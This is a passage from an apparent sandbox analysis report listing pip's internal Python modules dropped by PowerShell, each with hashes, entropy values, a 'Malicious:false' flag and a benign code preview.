                                                                                                                                                                                                              MD5:913AB688B48547F157B5D13B3E854813
                                                                                                                                                                                                              SHA1:442DC5866A60DAC7CA2578CD773C147E9E1C063A
                                                                                                                                                                                                              SHA-256:9B6D58DF002D41CFA38BA55E6FA93F33983A034672148E1E81C853767C21FA94
                                                                                                                                                                                                              SHA-512:F927ACA09E61B6DDB212C234727488AD92E4AC77131BB61AA9D9F4527FBA9877A1819B4DF12D7810DAA882C7BA08D8B3E1D041E6AF689210DE905C2F4AFD20AC
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""For when pip wants to check the date or time.."""..import datetime...def today_is_later_than(year: int, month: int, day: int) -> bool:. today = datetime.date.today(). given = datetime.date(year, month, day).. return today > given.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3627
                                                                                                                                                                                                              Entropy (8bit):4.513871213115879
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:zzE7PJcqlskEQsCWMeuOCykDPEuIf2XwB0W:zIjRWnuOl116W
                                                                                                                                                                                                              MD5:816175BFD9D11C2EE8C609B102953156
                                                                                                                                                                                                              SHA1:8C790F62DB12BB362628DB33E4992188A1D893DD
                                                                                                                                                                                                              SHA-256:34AA3C56A2E2A09E279D75C6996E0A75AB3117DD04147919687797D5F4F4F02F
                                                                                                                                                                                                              SHA-512:754C7FB0D46AF13CCA0C05663A2DB9775C8C0A16BE6D8D166F4FA2FA494985A33D22B267D32AC1D267A049CDAE1B3FAF25CBA924641A2B167406EB0A196CAE06
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:""".A module that implements tooling to enable easy warnings about deprecations.."""..import logging.import warnings.from typing import Any, Optional, TextIO, Type, Union..from pip._vendor.packaging.version import parse..from pip import __version__ as current_version # NOTE: tests patch this name...DEPRECATION_MSG_PREFIX = "DEPRECATION: "...class PipDeprecationWarning(Warning):. pass..._original_showwarning: Any = None...# Warnings <-> Logging Integration.def _showwarning(. message: Union[Warning, str],. category: Type[Warning],. filename: str,. lineno: int,. file: Optional[TextIO] = None,. line: Optional[str] = None,.) -> None:. if file is not None:. if _original_showwarning is not None:. _original_showwarning(message, category, filename, lineno, file, line). elif issubclass(category, PipDeprecationWarning):. # We use a specially named logger which will handle all of the. # deprecation messages for pip.. logger = loggi
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3206
                                                                                                                                                                                                              Entropy (8bit):4.41721615869807
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:jpU715//QnXpoT2/vGwQhFDd5K6gte3baYiOXaoS31oMYS96KDJGY/7T:jpdme6xLiOgFoMF9R4Y/7T
                                                                                                                                                                                                              MD5:3D5E258E0C3E2552C1BA4254BA2CC40B
                                                                                                                                                                                                              SHA1:DD92E884DF95195217318DB385B1DBD399D50D0C
                                                                                                                                                                                                              SHA-256:E85D6D736ADC29A0999A07D5C2C13A39B21EFCFBB1DB799455803ED83F700857
                                                                                                                                                                                                              SHA-512:6D2B54978F0915BB3F8509E29A58624AF1C20BDB288752D5845AB714DDE64C5D06DA0F98FAB93715D2C49C75150E73C88C15AE656480C03356D300206ED35FE6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import Optional..from pip._internal.models.direct_url import ArchiveInfo, DirectUrl, DirInfo, VcsInfo.from pip._internal.models.link import Link.from pip._internal.utils.urls import path_to_url.from pip._internal.vcs import vcs...def direct_url_as_pep440_direct_reference(direct_url: DirectUrl, name: str) -> str:. """Convert a DirectUrl to a pip requirement string.""". direct_url.validate() # if invalid, this is a pip bug. requirement = name + " @ ". fragments = []. if isinstance(direct_url.info, VcsInfo):. requirement += "{}+{}@{}".format(. direct_url.info.vcs, direct_url.url, direct_url.info.commit_id. ). elif isinstance(direct_url.info, ArchiveInfo):. requirement += direct_url.url. if direct_url.info.hash:. fragments.append(direct_url.info.hash). else:. assert isinstance(direct_url.info, DirInfo). requirement += direct_url.url. if direct_url.subdirectory:. fragments.append("sub
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2463
                                                                                                                                                                                                              Entropy (8bit):4.582459566567463
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:da7JM7wQ1OP1d7wrNSd3O01iXD563sI4dMfqtpCY2MmaLKo9LXIx5u:dl7DONtw+3O8kD568I4dFS+m2XIx5u
                                                                                                                                                                                                              MD5:779E46DB7BBC718A77B123CF76078CE1
                                                                                                                                                                                                              SHA1:7F16CAC0927CDF0A044E03F617A9E94A427B859E
                                                                                                                                                                                                              SHA-256:D0578F6685182AFE11190DADEB1EF0E59E36EF06C0FD4A375999C092B82CBAAA
                                                                                                                                                                                                              SHA-512:A2B7F6CBD31DFA7DF5C014E14BFB7FDB33EE41363E7E4531842C3B6F14DACF60DEECFB4F57346AE2072A48F7A1AFEC88DCFDC6DB1B0BA326E4FEB58F329E9FEA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import os.import re.import sys.from typing import List, Optional..from pip._internal.locations import site_packages, user_site.from pip._internal.utils.virtualenv import (. running_under_virtualenv,. virtualenv_no_global,.)..__all__ = [. "egg_link_path_from_sys_path",. "egg_link_path_from_location",.]...def _egg_link_names(raw_name: str) -> List[str]:. """. Convert a Name metadata value to a .egg-link name, by applying. the same substitution as pkg_resources's safe_name function.. Note: we cannot use canonicalize_name because it has a different logic... We also look for the raw name (without normalization) as setuptools 69 changed. the way it names .egg-link files (https://github.com/pypa/setuptools/issues/4167).. """. return [. re.sub("[^A-Za-z0-9.]+", "-", raw_name) + ".egg-link",. f"{raw_name}.egg-link",. ]...def egg_link_path_from_sys_path(raw_name: str) -> Optional[str]:. """. Look for a .egg-link file for project name, by
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1169
                                                                                                                                                                                                              Entropy (8bit):5.000664368044061
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:9dJ6f/5kaXMOvjjmuZF5wSy/WGLiT/RpqwaphPaw/baVY9g4e8+Kv:Hg/5jcOvjjmuN8ejNUjiw/2h47
                                                                                                                                                                                                              MD5:71781AF636DF2088D9C6FA15B8248724
                                                                                                                                                                                                              SHA1:31C2038B64DD5D3DD3C4CF560E354E4471B144A0
                                                                                                                                                                                                              SHA-256:AAAB170ED8B03088D730488855268E8F01F96268AB09A2BE748CDBEBE5C9B0BD
                                                                                                                                                                                                              SHA-512:A6D65005137278C217BDAE67FC2A971B22066DD5D8B307A96C0B40550BAD32E11870DC89411969290D2C3BAABDE8650CE34DC4CE58A0C22438DAB36733A53155
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import codecs.import locale.import re.import sys.from typing import List, Tuple..BOMS: List[Tuple[bytes, str]] = [. (codecs.BOM_UTF8, "utf-8"),. (codecs.BOM_UTF16, "utf-16"),. (codecs.BOM_UTF16_BE, "utf-16-be"),. (codecs.BOM_UTF16_LE, "utf-16-le"),. (codecs.BOM_UTF32, "utf-32"),. (codecs.BOM_UTF32_BE, "utf-32-be"),. (codecs.BOM_UTF32_LE, "utf-32-le"),.]..ENCODING_RE = re.compile(rb"coding[:=]\s*([-\w.]+)")...def auto_decode(data: bytes) -> str:. """Check a bytes string for a BOM to correctly detect the encoding.. Fallback to locale.getpreferredencoding(False) like open() on Python3""". for bom, encoding in BOMS:. if data.startswith(bom):. return data[len(bom) :].decode(encoding). # Lets check the first two lines as in PEP263. for line in data.split(b"\n")[:2]:. if line[0:1] == b"#" and ENCODING_RE.search(line):. result = ENCODING_RE.search(line). assert result is not None. encoding = result.gr
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3064
                                                                                                                                                                                                              Entropy (8bit):4.680639595700007
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:TvlkosG2/35jkXM50XK1gFIsSBbn1fUcZya9EvZOWwam3rKZSKtZ9dPr9S9ybIA:TvlkosTKXM5GDFIzZ1fJya9EvZOWwa3h
                                                                                                                                                                                                              MD5:6824909158AACEE9DF77A01C1783AF2E
                                                                                                                                                                                                              SHA1:DF1011DF89A89E8E184B38CF4232CC1B15446CC0
                                                                                                                                                                                                              SHA-256:62584B4D1976A07040BAA85CFB398BED4492EBB4CF5951C89A3780407ADE6534
                                                                                                                                                                                                              SHA-512:6BA7233C1F1EF34F5BF4FCF4FD0A420CADBDCB8A75C32EDC83AAE81C36E7503C569E786F61E03B55B57C6AEE70ED041B7E9FB1D889E18FCD2085AF09A1A727EF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import itertools.import os.import shutil.import sys.from typing import List, Optional..from pip._internal.cli.main import main.from pip._internal.utils.compat import WINDOWS.._EXECUTABLE_NAMES = [. "pip",. f"pip{sys.version_info.major}",. f"pip{sys.version_info.major}.{sys.version_info.minor}",.].if WINDOWS:. _allowed_extensions = {"", ".exe"}. _EXECUTABLE_NAMES = [. "".join(parts). for parts in itertools.product(_EXECUTABLE_NAMES, _allowed_extensions). ]...def _wrapper(args: Optional[List[str]] = None) -> int:. """Central wrapper for all old entrypoints... Historically pip has had several entrypoints defined. Because of issues. arising from PATH, sys.path, multiple Pythons, their interactions, and most. of them having a pip installed, users suffer every time an entrypoint gets. moved... To alleviate this pain, and provide a mechanism for warning users and. directing them to an appropriate place for help, we now define all of. our
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script text executable Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5122
                                                                                                                                                                                                              Entropy (8bit):4.553153847418192
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:zVW6uMIojkzH5WrQXbsB4RTN8D+aQuaOAL7hELnDGVv:zVuMTkzZW0XAB4RTN8DcJOAXSL6Vv
                                                                                                                                                                                                              MD5:DEEE0A94B232580C4DAC9C3741A00528
                                                                                                                                                                                                              SHA1:7E4452EE2A28E0E3E10D02D1BA115870E9540E4F
                                                                                                                                                                                                              SHA-256:4613085D468D54C1A3737AE1B036A1590E0C6AFBC440376A5EA82AF85E9FA70F
                                                                                                                                                                                                              SHA-512:A55B030CD406095F34A7772C448901141CD95EC0E9FD04DDB0F42D7DE950BF32DB091353A407EC7E844DDFDFAA25730BBD21D3A7B7AB56D3981AF6E71159BFA3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import fnmatch.import os.import os.path.import random.import sys.from contextlib import contextmanager.from tempfile import NamedTemporaryFile.from typing import Any, BinaryIO, Generator, List, Union, cast..from pip._vendor.tenacity import retry, stop_after_delay, wait_fixed..from pip._internal.utils.compat import get_path_uid.from pip._internal.utils.misc import format_size...def check_path_owner(path: str) -> bool:. # If we don't have a way to check the effective uid of this process, then. # we'll just assume that we own the directory.. if sys.platform == "win32" or not hasattr(os, "geteuid"):. return True.. assert os.path.isabs(path).. previous = None. while path != previous:. if os.path.lexists(path):. # Check if path is writable by current user.. if os.geteuid() == 0:. # Special handling for root user in order to handle properly. # cases where users use sudo without -H flag.. try:.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):716
                                                                                                                                                                                                              Entropy (8bit):5.128064341013586
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:cELEYBRrGB2BLZYnBLZ3CLaBLZXWYaBLZYKsBnJTeeG8WbJVw57eMF5YooXHv:cFYq2BmnBU2BBWYaBmT7yeG8WbJOF5ni
                                                                                                                                                                                                              MD5:DAAE55F86E9BAE3D0AFFC1181F6ACD85
                                                                                                                                                                                                              SHA1:B75E13EF5D44699F0AF4AE12882321E63045B936
                                                                                                                                                                                                              SHA-256:8BC5C04347850A8836E85C3DC95D186F5CA002A298075C3D0B3F67D1F8FC8195
                                                                                                                                                                                                              SHA-512:AFEDC5779F8E90FCF5840FFE49E7916971AA461B6056FB434078018518AFFFE834C9BD6A9DCE10D886361B1340807E09B7CD47F8D51C9FA8183C3EB759B59ABC
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Filetype information.."""..from typing import Tuple..from pip._internal.utils.misc import splitext..WHEEL_EXTENSION = ".whl".BZ2_EXTENSIONS: Tuple[str, ...] = (".tar.bz2", ".tbz").XZ_EXTENSIONS: Tuple[str, ...] = (. ".tar.xz",. ".txz",. ".tlz",. ".tar.lz",. ".tar.lzma",.).ZIP_EXTENSIONS: Tuple[str, ...] = (".zip", WHEEL_EXTENSION).TAR_EXTENSIONS: Tuple[str, ...] = (".tar.gz", ".tgz", ".tar").ARCHIVE_EXTENSIONS = ZIP_EXTENSIONS + BZ2_EXTENSIONS + TAR_EXTENSIONS + XZ_EXTENSIONS...def is_archive_file(name: str) -> bool:. """Return True if `name` is a considered as an archive file.""". ext = splitext(name)[1].lower(). if ext in ARCHIVE_EXTENSIONS:. return True. return False.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3113
                                                                                                                                                                                                              Entropy (8bit):4.827361926561468
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:ZMNMpeTLWUrUbFOt6eI0J3PeIOwea072T5ECUtGL7xMcIko/VKY:ZMNZTLWUr+wR1LOZ72TweKzF/VKY
                                                                                                                                                                                                              MD5:A806CD4E60BF0FECAF532A9B5B31EB5B
                                                                                                                                                                                                              SHA1:993BE097901608F3160F7E3FAFECCD7D1D21CA27
                                                                                                                                                                                                              SHA-256:31EB31C6083704BC6178B671F9D49FDF46FA80AA4E81D557C3A5BEFAE1D2B334
                                                                                                                                                                                                              SHA-512:8C182D639D0E8FA33357CFEE3368372D06EC0EAA393E61E77697F81D67D811A978FD4F90C220B10BF41BFA3D4BA4A132DCE55B9392E7B93E0A5185652D934C8C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import os.import sys.from typing import Optional, Tuple...def glibc_version_string() -> Optional[str]:. "Returns glibc version string, or None if not using glibc.". return glibc_version_string_confstr() or glibc_version_string_ctypes()...def glibc_version_string_confstr() -> Optional[str]:. "Primary implementation of glibc_version_string using os.confstr.". # os.confstr is quite a bit faster than ctypes.DLL. It's also less likely. # to be broken or missing. This strategy is used in the standard library. # platform module:. # https://github.com/python/cpython/blob/fcf1d003bf4f0100c9d0921ff3d70e1127ca1b71/Lib/platform.py#L175-L183. if sys.platform == "win32":. return None. try:. gnu_libc_version = os.confstr("CS_GNU_LIBC_VERSION"). if gnu_libc_version is None:. return None. # os.confstr("CS_GNU_LIBC_VERSION") returns a string like "glibc 2.17":. _, version = gnu_libc_version.split(). except (AttributeError, OSErr
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5118
                                                                                                                                                                                                              Entropy (8bit):4.517865882857644
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:fvrEB0PsuMoLSGXoTV+HmGX8s6yIibhrHLNdbf8+EH0Kj:7ELbG4TV+HmO8smi1rHJ9fMHfj
                                                                                                                                                                                                              MD5:EA92F1296B5F78FF606AB11DD214F312
                                                                                                                                                                                                              SHA1:F88BDEA46699ABB220C1F5720B4652629CB16B28
                                                                                                                                                                                                              SHA-256:3233A2802EF9CFAAA844C9201E21EAA2DEDEAB17F00D94AB11F94930F9BE6C71
                                                                                                                                                                                                              SHA-512:D1707C0A8775A1C7621C81E7ACBCF308E01F4684B3AB45350E777F39FB0B5B0F64ADC78DD181F4DFF3B36F4D41906FACCCE10DAD3A7F3E430D1559004ECC4DCA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import hashlib.from typing import TYPE_CHECKING, BinaryIO, Dict, Iterable, List, Optional..from pip._internal.exceptions import HashMismatch, HashMissing, InstallationError.from pip._internal.utils.misc import read_chunks..if TYPE_CHECKING:. from hashlib import _Hash.. # NoReturn introduced in 3.6.2; imported only for type checking to maintain. # pip compatibility with older patch versions of Python 3.6. from typing import NoReturn...# The recommended hash algo of the moment. Change this whenever the state of.# the art changes; it won't hurt backward compatibility..FAVORITE_HASH = "sha256"...# Names of hashlib algorithms allowed by the --hash option and ``pip hash``.# Currently, those are the ones at least as collision-resistant as sha256..STRONG_HASHES = ["sha256", "sha384", "sha512"]...class Hashes:. """A wrapper that builds multiple hashes at once and checks them against. known-good values.. """.. def __init__(self, hashes: Optional[Dict[str, List[str]]] = No
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):11603
                                                                                                                                                                                                              Entropy (8bit):4.446627443976613
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:qiZ5NF0lNQR6DWUDZr2Huat0L1Si2hx5pVADOrliz19UIMAcEzZnz+:qiZ5NePQR6XZKKLQDpVaAgzZMAbzZC
                                                                                                                                                                                                              MD5:0AD835A23492444085B4AED4A530E370
                                                                                                                                                                                                              SHA1:6CFC66CC5325E5E0D1DE8C31202EB486D71EBC0F
                                                                                                                                                                                                              SHA-256:7DDB6E649F802A4AB00D300D0EF19C044A6CB0BF1E97B4F58E7C24D429D99776
                                                                                                                                                                                                              SHA-512:C472B6D25C98EAA39C49ACE5F37A624988BA999D2379077945F9D8974A207AF04BD136018FF7FA34D56DDA95907269DD18D7157850CF7CC5D91E52889567F464
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import contextlib.import errno.import logging.import logging.handlers.import os.import sys.import threading.from dataclasses import dataclass.from io import TextIOWrapper.from logging import Filter.from typing import Any, ClassVar, Generator, List, Optional, TextIO, Type..from pip._vendor.rich.console import (. Console,. ConsoleOptions,. ConsoleRenderable,. RenderableType,. RenderResult,. RichCast,.).from pip._vendor.rich.highlighter import NullHighlighter.from pip._vendor.rich.logging import RichHandler.from pip._vendor.rich.segment import Segment.from pip._vendor.rich.style import Style..from pip._internal.utils._log import VERBOSE, getLogger.from pip._internal.utils.compat import WINDOWS.from pip._internal.utils.deprecation import DEPRECATION_MSG_PREFIX.from pip._internal.utils.misc import ensure_dir.._log_state = threading.local().subprocess_logger = getLogger("pip.subprocessor")...class BrokenStdoutLoggingError(Exception):. """. Raised if BrokenPipeError oc
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):23623
                                                                                                                                                                                                              Entropy (8bit):4.7563719569294
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:6dRrq8/RVgKgUkgpDvxLUcK/Mi3R2AlEvPOu/O0CYkjQE0RAEqibCGMbuVWP3/vN:6dRrq85tFLWb/vB2UUOzUQQEibCNCUP9
                                                                                                                                                                                                              MD5:E6A83F5B8D0DD3744860E95B00F165E1
                                                                                                                                                                                                              SHA1:872DF28D996A12A42EE287A09E0C88386C6C4FE4
                                                                                                                                                                                                              SHA-256:7CD5F069E7A292F9D4B7808F30520BE3E2106D90F1C638F88C3A730A2E19B0EC
                                                                                                                                                                                                              SHA-512:3F91620184643000F8278F4D2965F4D022324FC133933336C7860A835DEF9072CA0D659EC095834FABBEE11163F8BE98D8D79519CE2F448A022327091053B084
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import contextlib.import errno.import getpass.import hashlib.import io.import logging.import os.import posixpath.import shutil.import stat.import sys.import sysconfig.import urllib.parse.from functools import partial.from io import StringIO.from itertools import filterfalse, tee, zip_longest.from pathlib import Path.from types import FunctionType, TracebackType.from typing import (. Any,. BinaryIO,. Callable,. ContextManager,. Dict,. Generator,. Iterable,. Iterator,. List,. Optional,. TextIO,. Tuple,. Type,. TypeVar,. Union,. cast,.)..from pip._vendor.packaging.requirements import Requirement.from pip._vendor.pyproject_hooks import BuildBackendHookCaller.from pip._vendor.tenacity import retry, stop_after_delay, wait_fixed..from pip import __version__.from pip._internal.exceptions import CommandError, ExternallyManagedEnvironment.from pip._internal.locations import get_major_minor_version.from pip._internal.utils.compat import WINDOWS.from
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1193
                                                                                                                                                                                                              Entropy (8bit):4.604961326505357
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:GYV8VwJAxxFcyTQeQbnmSjmjg/yCXryJIIv:D2wJocOWpjmsqCXrEII
                                                                                                                                                                                                              MD5:2CEC238042EBD1D49C71C8901BBCB028
                                                                                                                                                                                                              SHA1:3DD814E8C7938BFDBBBFEA5EFB457EB59FCD0F2D
                                                                                                                                                                                                              SHA-256:E46A18539F3A4ABC5444CBC39FF8C13092278ADBE2260E0EE7E88E53EE88D166
                                                                                                                                                                                                              SHA-512:8A85DAAE5682CEA6BFECE76F9249CA9C93165174D02143FF8C36EC911E651820F852A0CE3E00F8EA06DFFD95B4DCF43178A9B49D0030A3D3F1F26ABEBFDEF342
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Utilities for defining models."""..import operator.from typing import Any, Callable, Type...class KeyBasedCompareMixin:. """Provides comparison capabilities that is based on a key""".. __slots__ = ["_compare_key", "_defining_class"].. def __init__(self, key: Any, defining_class: Type["KeyBasedCompareMixin"]) -> None:. self._compare_key = key. self._defining_class = defining_class.. def __hash__(self) -> int:. return hash(self._compare_key).. def __lt__(self, other: Any) -> bool:. return self._compare(other, operator.__lt__).. def __le__(self, other: Any) -> bool:. return self._compare(other, operator.__le__).. def __gt__(self, other: Any) -> bool:. return self._compare(other, operator.__gt__).. def __ge__(self, other: Any) -> bool:. return self._compare(other, operator.__ge__).. def __eq__(self, other: Any) -> bool:. return self._compare(other, operator.__eq__).. def _compare(self, other: Any, meth
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2108
                                                                                                                                                                                                              Entropy (8bit):4.7637552285305045
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:jncRgRE2HwcqDvLSwcqzpHhTR4kLmVTt4zSecRgE+MK8Uz37Xu:jcRgRVHwceOwc2pBTvaVTtgkST8UDK
                                                                                                                                                                                                              MD5:44BE67AD6261ED654E8AD10A7FFDAA1F
                                                                                                                                                                                                              SHA1:F9673A16D2FE6A03E450EE1E0D2C8C67EA812B87
                                                                                                                                                                                                              SHA-256:E569BAFF1EE52AB96A5633C8E4C04DFD1BAB7111F0558A10ECAB2BB3CE1D7BBB
                                                                                                                                                                                                              SHA-512:59FC39A6006AE2208A171D39D441E9A17ABA04EB0DCC7FA53BA9A5922E7ED95F5A2DCA504691D282C4D470878A313A69592AB0F8BA63D2EE53A27E959B8CC4C3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import functools.import logging.import re.from typing import NewType, Optional, Tuple, cast..from pip._vendor.packaging import specifiers, version.from pip._vendor.packaging.requirements import Requirement..NormalizedExtra = NewType("NormalizedExtra", str)..logger = logging.getLogger(__name__)...def check_requires_python(. requires_python: Optional[str], version_info: Tuple[int, ...].) -> bool:. """. Check if the given Python version matches a "Requires-Python" specifier... :param version_info: A 3-tuple of ints representing a Python. major-minor-micro version to check (e.g. `sys.version_info[:3]`)... :return: `True` if the given Python version satisfies the requirement.. Otherwise, return `False`... :raises InvalidSpecifier: If `requires_python` has an invalid format.. """. if requires_python is None:. # The package provides no information. return True. requires_python_specifier = specifiers.SpecifierSet(requires_python).. pyth
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4435
                                                                                                                                                                                                              Entropy (8bit):4.699482613201015
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:kbgreKp42fODz3khb1T8B94gMGlbJNaX8F0K34VTdtBN:kbghp4zDz0vinllLaz1djN
                                                                                                                                                                                                              MD5:9AE597EF5E68B8DD221A74A47327B0E6
                                                                                                                                                                                                              SHA1:B3BCCB4896004FF798DA12A3D87978F7B62EFC45
                                                                                                                                                                                                              SHA-256:A2E5E9B9DFA3792F313F24CFB1727E9B7E0D3EF2B9A2CE39A2D03375257F2091
                                                                                                                                                                                                              SHA-512:DB55ECACE9AEA1C8EFCE7D30664FD66A17C7D1A3735E4AAAEFDE39048BE75D0268542E925C5B30DEBBEB6063F6A465289B4C786EC3753A1BB4E424AA75017006
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import sys.import textwrap.from typing import List, Optional, Sequence..# Shim to wrap setup.py invocation with setuptools.# Note that __file__ is handled via two {!r} *and* %r, to ensure that paths on.# Windows are correctly handled (it should be "C:\\Users" not "C:\Users").._SETUPTOOLS_SHIM = textwrap.dedent(. """. exec(compile('''. # This is <pip-setuptools-caller> -- a caller that pip uses to run setup.py. #. # - It imports setuptools before invoking setup.py, to enable projects that directly. # import from `distutils.core` to work with newer packaging standards.. # - It provides a clear error message when setuptools is not installed.. # - It sets `sys.argv[0]` to the underlying `setup.py`, when invoking `setup.py` so. # setuptools doesn't think the script is `-c`. This avoids the following warning:. # manifest_maker: standard file '-c' not found".. # - It generates a shim setup.py, for handling setup.cfg-only projects.. import os, sys, t
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):9207
                                                                                                                                                                                                              Entropy (8bit):4.453211429819829
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:TbMPTT/+tsJHXvM2rJicKl5zLeuBTyTt+WW+JC:TbMPTqcMfFBTyTtQ
                                                                                                                                                                                                              MD5:17BD4BC40EECB1E99A4F82FBF350CE85
                                                                                                                                                                                                              SHA1:2A5EF413060467B26635CECB25418BA5F1308B11
                                                                                                                                                                                                              SHA-256:CF376299BEF98D52C4D465385A54D9D39E60733843EE7D72D714DC35CEEF3594
                                                                                                                                                                                                              SHA-512:CD027A1AA823B476B55C39AC5DAF49922DA74283658FE4ADA47E66E57793F77216DB8EA7914296B74835EDE1A4A126FCE83598356400BD854C7808C4CCFEC3ED
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import logging.import os.import shlex.import subprocess.from typing import (. TYPE_CHECKING,. Any,. Callable,. Iterable,. List,. Mapping,. Optional,. Union,.)..from pip._vendor.rich.markup import escape..from pip._internal.cli.spinners import SpinnerInterface, open_spinner.from pip._internal.exceptions import InstallationSubprocessError.from pip._internal.utils.logging import VERBOSE, subprocess_logger.from pip._internal.utils.misc import HiddenText..if TYPE_CHECKING:. # Literal was introduced in Python 3.8.. #. # TODO: Remove `if TYPE_CHECKING` when dropping support for Python 3.7.. from typing import Literal..CommandArgs = List[Union[str, HiddenText]]...def make_command(*args: Union[str, HiddenText, CommandArgs]) -> CommandArgs:. """. Create a CommandArgs object.. """. command_args: CommandArgs = []. for arg in args:. # Check for list instead of CommandArgs since CommandArgs is. # only known during type-checking..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):9312
                                                                                                                                                                                                              Entropy (8bit):4.365866948736783
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:rLimqx5ejyJSWl6pU/0VJB6cDtbKRp8dCLks+ajs8yCLDU0HkJqltwaV4Ypkq3l4:6m+sjyJN62Abty88gtinltU
                                                                                                                                                                                                              MD5:913F777212E4D08649A817F723CDB63F
                                                                                                                                                                                                              SHA1:0318C8A2E74430EEC9CD32CC2A5C762493014187
                                                                                                                                                                                                              SHA-256:0D4030DB6B85AEE41D2B8DE2D8BD8AE770BE0838D108F780B01289A6EFAB1D0E
